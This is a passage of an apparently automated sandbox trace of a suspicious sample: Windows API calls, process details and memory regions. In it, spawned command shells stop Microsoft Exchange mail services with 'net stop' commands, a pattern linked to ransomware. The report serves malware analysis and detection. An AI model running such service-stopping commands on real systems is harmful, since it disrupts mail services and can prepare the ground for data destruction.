lpServiceName="MSEXCHANGEMAILSUBMISSION", dwDesiredAccess=0x84) returned 0x0 [0137.419] GetLastError () returned 0x424 [0137.419] CloseServiceHandle (hSCObject=0x5286cd0) returned 1 [0137.419] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0137.419] LoadLibraryW (lpLibFileName="NETMSG") returned 0xda0000 [0137.420] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xda0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0137.421] GetFileType (hFile=0x40) returned 0x2 [0137.421] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd2f608 | out: lpMode=0xd2f608) returned 1 [0137.421] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xd2f614, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd2f614*=0x1e) returned 1 [0137.421] GetFileType (hFile=0x40) returned 0x2 [0137.421] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd2f608 | out: lpMode=0xd2f608) returned 1 [0137.421] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd2f614, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd2f614*=0x2) returned 1 [0137.421] _ultow (in: _Dest=0x889, _Radix=13825576 | out: _Dest=0x889) returned="2185" [0137.422] FormatMessageW (in: dwFlags=0x2800, lpSource=0xda0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0137.422] GetFileType (hFile=0x40) returned 0x2 [0137.422] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd2f5f8 | out: lpMode=0xd2f5f8) returned 1 [0137.422] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xd2f604, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xd2f604*=0x34) returned 1 [0137.422] GetFileType (hFile=0x40) returned 0x2 [0137.422] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xd2f5f8 | out: lpMode=0xd2f5f8) returned 1 [0137.422] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xd2f604, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xd2f604*=0x2) returned 1 [0137.422] NetApiBufferFree (Buffer=0x5287f78) returned 0x0 [0137.422] NetApiBufferFree (Buffer=0x5287f90) returned 0x0 [0137.422] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailSubmission" [0137.422] exit (_Code=2) Thread: id = 658 os_tid = 0x52c Process: id = "217" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29c0e000" os_pid = "0x824" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeMailboxAssistants" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10720 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10721 start_va = 0xd30000 end_va = 0x4d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 10722 start_va = 0x4d30000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 10723 start_va = 0x4d50000 end_va = 0x4d50fff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 10724 start_va = 0x4d60000 end_va = 0x4d73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 10725 start_va = 0x4d80000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 10726 start_va = 0x4dc0000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 10727 start_va = 0x4ec0000 end_va = 0x4ec3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ec0000" filename = "" Region: id = 10728 start_va = 0x4ed0000 end_va = 0x4ed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ed0000" filename = "" Region: id = 10729 start_va = 0x4ee0000 end_va = 0x4ee1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 10730 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10731 start_va = 0x7ef20000 end_va = 0x7ef42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef20000" filename = "" Region: id = 10732 start_va = 0x7ef45000 end_va = 0x7ef45fff entry_point = 0x0 region_type = private name = "private_0x000000007ef45000" filename = "" Region: id = 10733 start_va = 0x7ef4c000 end_va = 0x7ef4efff entry_point = 0x0 region_type = private name = "private_0x000000007ef4c000" filename = "" Region: id = 10734 start_va = 0x7ef4f000 end_va = 0x7ef4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef4f000" filename = "" Region: id = 10735 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10736 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10737 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10738 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10739 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10740 start_va = 0x50c0000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 10741 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10742 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10743 start_va = 0x4f30000 end_va = 0x502ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f30000" filename = "" Region: id = 10744 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10785 start_va = 0x4d30000 end_va = 0x4d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d30000" filename = "" Region: id = 10786 start_va = 0x4ef0000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 10787 start_va = 0x50d0000 end_va = 0x518dfff entry_point = 0x50d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10788 start_va = 0x5190000 end_va = 0x528ffff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 10789 start_va = 0x5470000 end_va = 0x547ffff entry_point = 0x0 region_type = private name = "private_0x0000000005470000" filename = "" Region: id = 10790 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10791 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10792 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10793 start_va = 0x7ee20000 end_va = 0x7ef1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee20000" filename = "" Region: id = 10794 start_va = 0x7ef49000 end_va = 0x7ef4bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef49000" filename = "" Region: id = 10795 start_va = 0x4d40000 end_va = 0x4d43fff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 10796 start_va = 0x4d50000 end_va = 0x4d53fff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 10797 start_va = 0x5480000 end_va = 0x57b6fff entry_point = 0x5480000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 659 os_tid = 0xbfc [0137.570] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0137.570] __set_app_type (_Type=0x1) [0137.570] __p__fmode () returned 0x77ac4d6c [0137.570] __p__commode () returned 0x77ac5b1c [0137.570] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0137.570] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0137.570] GetCurrentThreadId () returned 0xbfc [0137.570] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbfc) returned 0x84 [0137.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.570] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0137.571] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.573] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.573] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf89c | out: phkResult=0x4ebf89c*=0x0) returned 0x2 [0137.573] VirtualQuery (in: lpAddress=0x4ebf8a3, lpBuffer=0x4ebf854, dwLength=0x1c | out: lpBuffer=0x4ebf854*(BaseAddress=0x4ebf000, AllocationBase=0x4dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.573] VirtualQuery (in: lpAddress=0x4dc0000, lpBuffer=0x4ebf854, dwLength=0x1c | out: lpBuffer=0x4ebf854*(BaseAddress=0x4dc0000, AllocationBase=0x4dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0137.573] VirtualQuery (in: lpAddress=0x4dc1000, lpBuffer=0x4ebf854, dwLength=0x1c | out: lpBuffer=0x4ebf854*(BaseAddress=0x4dc1000, AllocationBase=0x4dc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0137.573] VirtualQuery (in: lpAddress=0x4dc3000, lpBuffer=0x4ebf854, dwLength=0x1c | out: lpBuffer=0x4ebf854*(BaseAddress=0x4dc3000, AllocationBase=0x4dc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0137.573] VirtualQuery (in: lpAddress=0x4ec0000, lpBuffer=0x4ebf854, dwLength=0x1c | out: lpBuffer=0x4ebf854*(BaseAddress=0x4ec0000, AllocationBase=0x4ec0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0137.573] GetConsoleOutputCP () returned 0x1b5 [0137.573] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.573] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0137.573] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.574] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0137.574] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.574] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.574] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.574] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.574] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.574] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.574] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.574] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0137.574] GetEnvironmentStringsW () returned 0x4f37d88* [0137.575] FreeEnvironmentStringsA (penv="A") returned 1 [0137.575] GetEnvironmentStringsW () returned 0x4f37d88* [0137.575] FreeEnvironmentStringsA (penv="A") returned 1 [0137.575] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ebe800 | out: phkResult=0x4ebe800*=0x94) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x48, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x1, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x1, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x0, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x40, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x40, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x40, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegCloseKey (hKey=0x94) returned 0x0 [0137.575] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4ebe800 | out: phkResult=0x4ebe800*=0x94) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x40, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x1, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x1, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x0, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x9, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x4, lpData=0x4ebe80c*=0x9, lpcbData=0x4ebe808*=0x4) returned 0x0 [0137.575] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ebe804, lpData=0x4ebe80c, lpcbData=0x4ebe808*=0x1000 | out: lpType=0x4ebe804*=0x0, lpData=0x4ebe80c*=0x9, lpcbData=0x4ebe808*=0x1000) returned 0x2 [0137.575] RegCloseKey (hKey=0x94) returned 0x0 [0137.575] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983a [0137.575] srand (_Seed=0x5ad2983a) [0137.575] GetCommandLineW () returned="/c net stop MSExchangeMailboxAssistants" [0137.575] GetCommandLineW () returned="/c net stop MSExchangeMailboxAssistants" [0137.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.576] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f39ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0137.576] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.576] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0137.576] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.576] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0137.576] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0137.576] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0137.576] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0137.576] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0137.576] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0137.576] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0137.576] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0137.576] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0137.576] GetEnvironmentStringsW () returned 0x4f37d88* [0137.576] FreeEnvironmentStringsA (penv="A") returned 1 [0137.576] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.576] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0137.576] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0137.576] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0137.576] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0137.576] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0137.576] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0137.576] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0137.576] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0137.576] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0137.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ebf5d8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.577] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4ebf5d8, lpFilePart=0x4ebf5d0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4ebf5d0*="Desktop") returned 0x1d [0137.577] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.577] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4ebf358 | out: lpFindFileData=0x4ebf358) returned 0x4f305c8 [0137.577] FindClose (in: hFindFile=0x4f305c8 | out: hFindFile=0x4f305c8) returned 1 [0137.577] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4ebf358 | out: lpFindFileData=0x4ebf358) returned 0x4f305c8 [0137.577] FindClose (in: hFindFile=0x4f305c8 | out: hFindFile=0x4f305c8) returned 1 [0137.577] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0137.577] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4ebf358 | out: lpFindFileData=0x4ebf358) returned 0x4f305c8 [0137.577] FindClose (in: hFindFile=0x4f305c8 | out: hFindFile=0x4f305c8) returned 1 [0137.577] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0137.577] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0137.577] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0137.577] GetEnvironmentStringsW () returned 0x4f37d88* [0137.577] FreeEnvironmentStringsA (penv="=") returned 1 [0137.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0137.578] GetConsoleOutputCP () returned 0x1b5 [0137.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.578] GetUserDefaultLCID () returned 0x409 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ebf708, cchData=128 | out: lpLCData="0") returned 2 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ebf708, cchData=128 | out: lpLCData="0") returned 2 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ebf708, cchData=128 | out: lpLCData="1") returned 2 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0137.578] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0137.579] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0137.579] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0137.579] GetConsoleTitleW (in: lpConsoleTitle=0x4f3aa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0137.580] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0137.580] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0137.580] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0137.580] _wcsicmp (_String1="net", _String2=")") returned 69 [0137.580] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0137.580] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0137.580] _wcsicmp (_String1="IF", _String2="net") returned -5 [0137.580] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0137.580] _wcsicmp (_String1="REM", _String2="net") returned 4 [0137.580] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0137.581] GetConsoleTitleW (in: lpConsoleTitle=0x4ebf3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.581] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.581] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.581] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.581] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.581] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.581] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.581] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.581] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.581] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.581] _wcsicmp 